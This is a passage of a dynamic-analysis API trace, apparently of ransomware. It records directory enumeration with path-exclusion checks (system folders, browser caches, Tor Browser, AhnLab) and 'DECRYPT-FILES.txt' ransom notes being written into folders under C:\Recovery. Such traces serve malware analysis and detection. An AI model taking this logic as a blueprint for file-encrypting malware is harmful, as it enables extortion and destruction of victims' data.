ftCreationTime.dwLowDateTime=0xaf770e60, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x88254af0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x88254af0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla Maintenance Service", cAlternateFileName="MOZILL~2")) returned 1 [0071.427] lstrcmpW (lpString1="Mozilla Maintenance Service", lpString2=".") returned 1 [0071.427] lstrcmpW (lpString1="Mozilla Maintenance Service", lpString2="..") returned 1 [0071.427] lstrcatW (in: lpString1="Mozilla Maintenance Service", lpString2="\\" | out: lpString1="Mozilla Maintenance Service\\") returned="Mozilla Maintenance Service\\" [0071.427] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Mozilla Maintenance Service\\" | out: lpString1="C:\\Program Files (x86)\\Mozilla Maintenance Service\\") returned="C:\\Program Files (x86)\\Mozilla Maintenance Service\\" [0071.427] StrStrW (lpFirst="C:\\Program Files (x86)\\Mozilla Maintenance Service\\", lpSrch="SQL") returned 0x0 [0071.427] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8822e990, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8822e990, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSBuild", cAlternateFileName="")) returned 1 [0071.427] lstrcmpW (lpString1="MSBuild", lpString2=".") returned 1 [0071.427] lstrcmpW (lpString1="MSBuild", lpString2="..") returned 1 [0071.427] lstrcatW (in: lpString1="MSBuild", lpString2="\\" | out: lpString1="MSBuild\\") returned="MSBuild\\" [0071.427] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="MSBuild\\" | out: lpString1="C:\\Program Files (x86)\\MSBuild\\") returned="C:\\Program Files (x86)\\MSBuild\\" [0071.427] StrStrW (lpFirst="C:\\Program Files (x86)\\MSBuild\\", lpSrch="SQL") returned 0x0 [0071.427] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reference Assemblies", cAlternateFileName="REFERE~1")) returned 1 [0071.427] lstrcmpW (lpString1="Reference Assemblies", lpString2=".") returned 1 [0071.427] lstrcmpW (lpString1="Reference Assemblies", lpString2="..") returned 1 [0071.427] lstrcatW (in: lpString1="Reference Assemblies", lpString2="\\" | out: lpString1="Reference Assemblies\\") returned="Reference Assemblies\\" [0071.427] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Reference Assemblies\\" | out: lpString1="C:\\Program Files (x86)\\Reference Assemblies\\") returned="C:\\Program Files (x86)\\Reference Assemblies\\" [0071.427] StrStrW (lpFirst="C:\\Program Files (x86)\\Reference Assemblies\\", lpSrch="SQL") returned 0x0 [0071.427] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x8907f814, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x8907f814, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x8907f814, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uninstall Information", cAlternateFileName="UNINST~1")) returned 1 [0071.427] lstrcmpW (lpString1="Uninstall Information", lpString2=".") returned 1 [0071.427] lstrcmpW (lpString1="Uninstall Information", lpString2="..") returned 1 [0071.427] lstrcatW (in: lpString1="Uninstall Information", lpString2="\\" | out: lpString1="Uninstall Information\\") returned="Uninstall Information\\" [0071.427] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Uninstall Information\\" | out: lpString1="C:\\Program Files (x86)\\Uninstall Information\\") returned="C:\\Program Files (x86)\\Uninstall Information\\" [0071.427] StrStrW (lpFirst="C:\\Program Files (x86)\\Uninstall Information\\", lpSrch="SQL") returned 0x0 [0071.427] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x88208830, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x88208830, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~3")) returned 1 [0071.427] lstrcmpW (lpString1="Windows Defender", lpString2=".") returned 1 [0071.427] lstrcmpW (lpString1="Windows Defender", lpString2="..") returned 1 [0071.427] lstrcatW (in: lpString1="Windows Defender", lpString2="\\" | out: lpString1="Windows Defender\\") returned="Windows Defender\\" [0071.427] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Windows Defender\\" | out: lpString1="C:\\Program Files (x86)\\Windows Defender\\") returned="C:\\Program Files (x86)\\Windows Defender\\" [0071.427] StrStrW (lpFirst="C:\\Program Files (x86)\\Windows Defender\\", lpSrch="SQL") returned 0x0 [0071.427] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd91d5ea, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea6723d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~1")) returned 1 [0071.428] lstrcmpW (lpString1="Windows Mail", lpString2=".") returned 1 [0071.428] lstrcmpW (lpString1="Windows Mail", lpString2="..") returned 1 [0071.428] lstrcatW (in: lpString1="Windows Mail", lpString2="\\" | out: lpString1="Windows Mail\\") returned="Windows Mail\\" [0071.428] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Windows Mail\\" | out: lpString1="C:\\Program Files (x86)\\Windows Mail\\") returned="C:\\Program Files (x86)\\Windows Mail\\" [0071.428] StrStrW (lpFirst="C:\\Program Files (x86)\\Windows Mail\\", lpSrch="SQL") returned 0x0 [0071.428] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x88254af0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x88254af0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player", cAlternateFileName="WI54FB~1")) returned 1 [0071.428] lstrcmpW (lpString1="Windows Media Player", lpString2=".") returned 1 [0071.428] lstrcmpW (lpString1="Windows Media Player", lpString2="..") returned 1 [0071.428] lstrcatW (in: lpString1="Windows Media Player", lpString2="\\" | out: lpString1="Windows Media Player\\") returned="Windows Media Player\\" [0071.428] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Windows Media Player\\" | out: lpString1="C:\\Program Files (x86)\\Windows Media Player\\") returned="C:\\Program Files (x86)\\Windows Media Player\\" [0071.428] StrStrW (lpFirst="C:\\Program Files (x86)\\Windows Media Player\\", lpSrch="SQL") returned 0x0 [0071.428] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0071.428] lstrcmpW (lpString1="Windows NT", lpString2=".") returned 1 [0071.428] lstrcmpW (lpString1="Windows NT", lpString2="..") returned 1 [0071.428] lstrcatW (in: lpString1="Windows NT", lpString2="\\" | out: lpString1="Windows NT\\") returned="Windows NT\\" [0071.428] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Windows NT\\" | out: lpString1="C:\\Program Files (x86)\\Windows NT\\") returned="C:\\Program Files (x86)\\Windows NT\\" [0071.428] StrStrW (lpFirst="C:\\Program Files (x86)\\Windows NT\\", lpSrch="SQL") returned 0x0 [0071.428] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea40f84, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea40f84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Photo Viewer", cAlternateFileName="WINDOW~4")) returned 1 [0071.428] lstrcmpW (lpString1="Windows Photo Viewer", lpString2=".") returned 1 [0071.428] lstrcmpW (lpString1="Windows Photo Viewer", lpString2="..") returned 1 [0071.428] lstrcatW (in: lpString1="Windows Photo Viewer", lpString2="\\" | out: lpString1="Windows Photo Viewer\\") returned="Windows Photo Viewer\\" [0071.428] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Windows Photo Viewer\\" | out: lpString1="C:\\Program Files (x86)\\Windows Photo Viewer\\") returned="C:\\Program Files (x86)\\Windows Photo Viewer\\" [0071.428] StrStrW (lpFirst="C:\\Program Files (x86)\\Windows Photo Viewer\\", lpSrch="SQL") returned 0x0 [0071.428] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x88208830, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x88208830, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Portable Devices", cAlternateFileName="WIBFE5~1")) returned 1 [0071.428] lstrcmpW (lpString1="Windows Portable Devices", lpString2=".") returned 1 [0071.428] lstrcmpW (lpString1="Windows Portable Devices", lpString2="..") returned 1 [0071.428] lstrcatW (in: lpString1="Windows Portable Devices", lpString2="\\" | out: lpString1="Windows Portable Devices\\") returned="Windows Portable Devices\\" [0071.428] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Windows Portable Devices\\" | out: lpString1="C:\\Program Files (x86)\\Windows Portable Devices\\") returned="C:\\Program Files (x86)\\Windows Portable Devices\\" [0071.428] StrStrW (lpFirst="C:\\Program Files (x86)\\Windows Portable Devices\\", lpSrch="SQL") returned 0x0 [0071.428] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 1 [0071.428] lstrcmpW (lpString1="Windows Sidebar", lpString2=".") returned 1 [0071.428] lstrcmpW (lpString1="Windows Sidebar", lpString2="..") returned 1 [0071.428] lstrcatW (in: lpString1="Windows Sidebar", lpString2="\\" | out: lpString1="Windows Sidebar\\") returned="Windows Sidebar\\" [0071.429] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Windows Sidebar\\" | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar\\") returned="C:\\Program Files (x86)\\Windows Sidebar\\" [0071.429] StrStrW (lpFirst="C:\\Program Files (x86)\\Windows Sidebar\\", lpSrch="SQL") returned 0x0 [0071.429] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar\\", cAlternateFileName="WI4223~1")) returned 0 [0071.429] FindClose (in: hFindFile=0x5f8bd8 | out: hFindFile=0x5f8bd8) returned 1 [0071.429] CloseHandle (hObject=0x418) returned 1 [0071.429] FindNextFileW (in: hFindFile=0x5f8ad8, lpFindFileData=0x3f2f8c4 | out: lpFindFileData=0x3f2f8c4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9b32f2a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x9b32f2a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x625898, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0071.429] lstrcmpW (lpString1="ProgramData", lpString2=".") returned 1 [0071.429] lstrcmpW (lpString1="ProgramData", lpString2="..") returned 1 [0071.429] lstrcatW (in: lpString1="ProgramData", lpString2="\\" | out: lpString1="ProgramData\\") returned="ProgramData\\" [0071.429] lstrcatW (in: lpString1="C:\\", lpString2="ProgramData\\" | out: lpString1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0071.429] StrStrW (lpFirst="C:\\ProgramData\\", lpSrch="\\Program Files") returned 0x0 [0071.430] StrStrW (lpFirst="C:\\ProgramData\\", lpSrch=":\\Windows") returned 0x0 [0071.430] StrStrW (lpFirst="C:\\ProgramData\\", lpSrch="\\Games\\") returned 0x0 [0071.430] StrStrW (lpFirst="C:\\ProgramData\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.430] StrStrW (lpFirst="C:\\ProgramData\\", lpSrch="\\ProgramData\\") returned="\\ProgramData\\" [0071.430] FindNextFileW (in: hFindFile=0x5f8ad8, lpFindFileData=0x3f2f8c4 | out: lpFindFileData=0x3f2f8c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x625898, cFileName="Recovery", cAlternateFileName="")) returned 1 [0071.430] lstrcmpW (lpString1="Recovery", lpString2=".") returned 1 [0071.430] lstrcmpW (lpString1="Recovery", lpString2="..") returned 1 [0071.430] lstrcatW (in: lpString1="Recovery", lpString2="\\" | out: lpString1="Recovery\\") returned="Recovery\\" [0071.430] lstrcatW (in: lpString1="C:\\", lpString2="Recovery\\" | out: lpString1="C:\\Recovery\\") returned="C:\\Recovery\\" [0071.430] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="\\Program Files") returned 0x0 [0071.430] StrStrW (lpFirst="C:\\Recovery\\", lpSrch=":\\Windows") returned 0x0 [0071.430] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="\\Games\\") returned 0x0 [0071.430] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.430] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.430] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.430] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.430] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.430] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="\\All Users") returned 0x0 [0071.430] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.430] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.430] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.430] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="AhnLab") returned 0x0 [0071.430] StrStrW (lpFirst="C:\\Recovery\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.430] lstrlenW (lpString="C:\\Recovery\\") returned 12 [0071.430] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.430] wsprintfW (in: param_1=0x3f2ee28, param_2="%s\\%s" | out: param_1="C:\\Recovery\\\\jkbimi8.tmp") returned 24 [0071.430] CreateFileW (lpFileName="C:\\Recovery\\\\jkbimi8.tmp" (normalized: "c:\\recovery\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x418 [0071.432] lstrlenW (lpString="C:\\Recovery\\") returned 12 [0071.432] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.432] wsprintfW (in: param_1=0x3f2ee28, param_2="%s\\%s" | out: param_1="C:\\Recovery\\\\DECRYPT-FILES.txt") returned 30 [0071.432] CreateFileW (lpFileName="C:\\Recovery\\\\DECRYPT-FILES.txt" (normalized: "c:\\recovery\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0071.432] WriteFile (in: hFile=0x41c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2ee24, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2ee24*=0x23fc, lpOverlapped=0x0) returned 1 [0071.433] CloseHandle (hObject=0x41c) returned 1 [0071.433] lstrlenW (lpString="C:\\Recovery\\") returned 12 [0071.433] lstrcatW (in: lpString1="C:\\Recovery\\", lpString2="*" | out: lpString1="C:\\Recovery\\*") returned="C:\\Recovery\\*" [0071.433] FindFirstFileW (in: lpFileName="C:\\Recovery\\*", lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa6cda6a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6cda6a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8bd8 [0071.433] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.433] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa6cda6a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6cda6a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.433] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.433] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.433] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6cda6a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6cda6a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6cda6a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.434] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.434] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", cAlternateFileName="E9E239~1")) returned 1 [0071.434] lstrcmpW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2=".") returned 1 [0071.434] lstrcmpW (lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="..") returned 1 [0071.434] lstrcatW (in: lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpString2="\\" | out: lpString1="e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\") returned="e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\" [0071.434] lstrcatW (in: lpString1="C:\\Recovery\\", lpString2="e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\" | out: lpString1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\") returned="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\" [0071.434] StrStrW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpSrch="\\Program Files") returned 0x0 [0071.434] StrStrW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpSrch=":\\Windows") returned 0x0 [0071.434] StrStrW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpSrch="\\Games\\") returned 0x0 [0071.434] StrStrW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.434] StrStrW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.434] StrStrW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.434] StrStrW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.434] StrStrW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.434] StrStrW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpSrch="\\All Users") returned 0x0 [0071.434] StrStrW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.434] StrStrW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.434] StrStrW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.434] StrStrW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpSrch="AhnLab") returned 0x0 [0071.434] StrStrW (lpFirst="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.434] lstrlenW (lpString="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\") returned 49 [0071.434] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.434] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\\\jkbimi8.tmp") returned 61 [0071.434] CreateFileW (lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\\\jkbimi8.tmp" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0071.434] lstrlenW (lpString="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\") returned 49 [0071.435] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.435] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\\\DECRYPT-FILES.txt") returned 67 [0071.435] CreateFileW (lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\\\DECRYPT-FILES.txt" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0071.440] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0071.441] CloseHandle (hObject=0x424) returned 1 [0071.442] lstrlenW (lpString="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\") returned 49 [0071.442] lstrcatW (in: lpString1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpString2="*" | out: lpString1="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*") returned="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*" [0071.442] FindFirstFileW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*", lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa6cda6a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6cda6a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", 